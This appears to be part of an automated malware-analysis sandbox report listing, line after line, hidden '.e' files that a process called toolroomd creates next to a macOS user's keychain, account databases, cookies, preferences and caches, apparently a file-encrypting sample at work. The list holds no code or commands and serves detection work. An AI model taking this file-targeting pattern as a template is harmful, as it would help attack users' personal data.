Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.44E5E857-A87B-40B0-9C16-BE47EEE10853.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.4F1B0166-6094-4AC7-BDC1-19AD07F91616.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.4F1B0166-6094-4AC7-BDC1-19AD07F91616.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.53850C24-44F5-4CD9-B391-C3DB18E01593.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.53850C24-44F5-4CD9-B391-C3DB18E01593.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.639B602D-9E09-436A-BFD7-D5C62C5DBF82.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.6926BE27-BCE7-4C7E-8FFB-89D9EC78F11A.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.849B4B4C-DBBA-480B-BFF5-006FCCE558FA.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.98615EBB-D2DF-45F6-8D34-499F9098DE29.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.A1C22BEB-F57B-44E1-9470-D26CBCE7DD06.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.B265C232-627B-4790-A8B8-B3822113C54A.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.B265C232-627B-4790-A8B8-B3822113C54A.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.C60309AD-9AF3-409D-ADC5-AEF264639E02.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.C60309AD-9AF3-409D-ADC5-AEF264639E02.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.D633C10E-C2FC-4A25-8A88-85C03207AF10.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.E499D2F8-4CBA-464F-AD65-1B3663DD9343.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.E499D2F8-4CBA-464F-AD65-1B3663DD9343.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.E644371A-2504-4862-8E9A-B0D3FB6EE159.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.E644371A-2504-4862-8E9A-B0D3FB6EE159.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.F01EAF3E-0906-4403-806A-CA639D38E2A8.history.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/.bash_sessions/.F01EAF3E-0906-4403-806A-CA639D38E2A8.historynew.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Accounts/.Accounts4.sqlite.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Accounts/.Accounts4.sqlite-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Accounts/.Accounts4.sqlite-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/com.apple.internal.ck/.history.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/com.apple.internal.ck/.main.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/com.apple.internal.ck/.synched.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Cookies/.com.microsoft.OneDriveStandaloneUpdater.binarycookies.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.Fixed Width.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.Fun.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.Modern.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.PDF.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.Traditional.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/FontCollections/.Web.collection.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Keychains/.login.keychain-db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.appstore.commerce.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.CallHistorySyncHelper.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.cloudd.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.CommCenter.counts.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.commerce.configurator.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.commerce.knownclients.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.commerce.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.configurator.ui.commerce.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.coreauthd.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.CoreGraphics.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.coreservices.uiagent.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.coreservices.useractivityd.dynamicuseractivites.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.corespotlightui.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.dock.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.driver.AppleBluetoothMultitouch.mouse.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.HIToolbox.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.iBooksX.commerce.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.madrid.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.Messages.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.PubSubAgent.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.security.cloudkeychainproxy3.keysToRegister.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.siri.context.service.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.apple.textInput.keyboardServices.textReplacement.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.autoupdate.fba.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.autoupdate2.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.office.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.OneDriveStandaloneUpdater.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.OneDriveUpdater.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/.com.microsoft.shared.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Spelling/.dynamic-counts.dat.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/CallHistoryDB/.com.apple.callhistory.databaseInfo.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/Microsoft AU Daemon/.FirstStartTime.dat.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/OneDriveStandaloneUpdater/.FirstStartTime.dat.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.cache_delete/.CacheDeleteAnalytics.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.cache_delete/.CacheDeleteRecentInfo_v2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/.HelpCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/.HelpindexCache.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.keyboardservicesd/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.parsecd/.spotlight_stopword.map.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate.fba/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.autoupdate2/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db-shm.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.microsoft.OneDriveStandaloneUpdater/.Cache.db-wal.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.xamarin.fontconfig/.84c0f976e30e948e99073af70f4ae876-le32d4.cache-3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.xamarin.fontconfig/.b0a71e6bf6a8a1a908413a823d76e21f-le32d4.cache-3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/OneDrive/.UpdateRingSettings.json.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55551039-1526-493E-94BA-D7174A081E6E.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/55B84E7C-0E66-4F49-A679-F7EF35486EBA.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/830E24F7-620D-4662-93D1-BCCC155BA6F2.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/.Info.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.accessibility.mediaaccessibilityd/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.AddressBook.ContactsAccountsService/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CalendarAgent/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CalendarNotification.CalNCService/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CloudDocs.MobileDocumentsFileProvider/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.CloudPhotosConfiguration/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.cloudphotosd/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.ContactsAgent/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.DataDetectorsLocalSources/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.iBooksX.CacheDelete/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.iCal.CalendarNC/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.MailCacheDelete/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.mediaanalysisd/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.MediaLibraryService/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.quicklook.ui.helper/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.Safari.CacheDeleteExtension/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.apple.siri.media-indexer/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Excel/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Office365ServiceV2/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.onenote.mac/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Outlook/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Powerpoint/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Containers/com.microsoft.Word/.Container.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.ms/.Microsoft AutoUpdate.MERP.params.txt.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Group Containers/UBF8T346G9.ms/.Microsoft Update Assistant.MERP.params.txt.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/ByHost/.com.apple.commcenter.csidata.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/ByHost/.com.apple.coreservices.appleidauthenticationinfo.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/ByHost/.com.apple.dock.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Preferences/ByHost/.com.apple.ManagedClient.3A7FAF4A-609F-48E7-9855-8176C0BDCC67.plist.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/PubSub/Database/.Database.sqlite3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Saved Application State/com.apple.finder.savedState/.data.data.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Saved Application State/com.apple.finder.savedState/.window_1.data.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0500C3D8-71CC-4F10-9A04-C734C0372C56.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.06811EED-910F-4F71-84F3-0549384B555E.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.09EC5A9B-FCC4-44B9-9CE2-E866A248B37C.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0B1EF230-3CC4-41CA-AAF8-A14619F7CB61.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0D33E0DC-786F-4B93-A829-78FCB8C38FD8.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.0F087FFD-0CA5-45C5-9228-005B6B603CC3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1163B4FB-CC70-41B9-995A-7FAF926BBB0E.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1525134B-E175-49D0-9C5D-0DE132EC2F9C.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.16B65782-25C9-4DF2-AD10-5621031126CD.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.1E9FF711-76C5-4137-B149-FD9402308D60.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.272F131E-17D0-41E8-8C43-CFC72112DE29.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.2A345237-F669-451B-8016-B4A12B1A0E85.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.2F702D30-45E9-445C-B3F5-72A70D2A9916.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.30534F7C-12F4-4591-BB02-EC61EB7DB850.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.3A871320-D3DC-4473-9CCB-8155D9A348EC.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.3D530EC5-BAEE-4741-9211-6ADBB71586BA.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.41CD3BED-AD86-43C8-8290-031AB71A920C.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.434349F7-87F1-4514-B525-A51E992340F3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.48594D12-72CE-48ED-8D80-E440D08845AF.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.4FEE0CA6-CA85-4946-B181-6D05108857F0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.5474A8D2-0EAF-45C2-B6F2-E1269E28AEEB.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.593D04E5-7B81-43EB-B5C5-297A4A6AC5D3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.5D9D3739-0751-4BC2-BBEC-5F9F5EB9E750.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.60700780-5972-4FC5-A382-B11854280CD2.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.62A85DC9-5FB4-46EE-AC7A-0B5083520C6D.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.75F55D06-2316-418C-ACA9-FEF330169885.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.7B8B6527-E826-4D80-B1FD-A9007A583230.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.81986435-AFA2-44FA-AB34-8B0BCDF8D374.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.8C92B4B1-CC7C-4F15-A66E-BCFDB534A2FC.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.8FDA5919-56D2-4E8B-ACEB-0865B79DB3F3.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9008F788-1CD3-4DF1-BA8B-EEC06944CF99.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.91F275E7-30A1-4649-B5AB-BF339215FD54.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.92C0CE04-E406-4663-BD2A-D9E39189DBBA.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9740087F-7EBF-4EB7-8963-FFF64013EA5A.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.9D48E99D-B821-4ACC-A13C-FD947239DDFA.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A0AEA798-0C7D-484D-9903-0F5E8BBCD985.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A30EF25D-E1C0-4B34-AC71-A8221A71B939.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A45A8B18-E93B-4819-9298-00E0843F082E.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.A5CF2005-AC95-4DE4-9774-0879505F2999.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.AD51A44D-7A76-42B0-8647-1F59ED82F1E0.e	Jump to behavior
Source: /Library/mixednkey/toolroomd (PID: 639)	Hidden File created: /Users/berri/Library/Caches/com.apple.helpd/fsCachedData/.ADC5DCE9-2F33-4272-B674-11433D26B20E.e	Jump to behavior
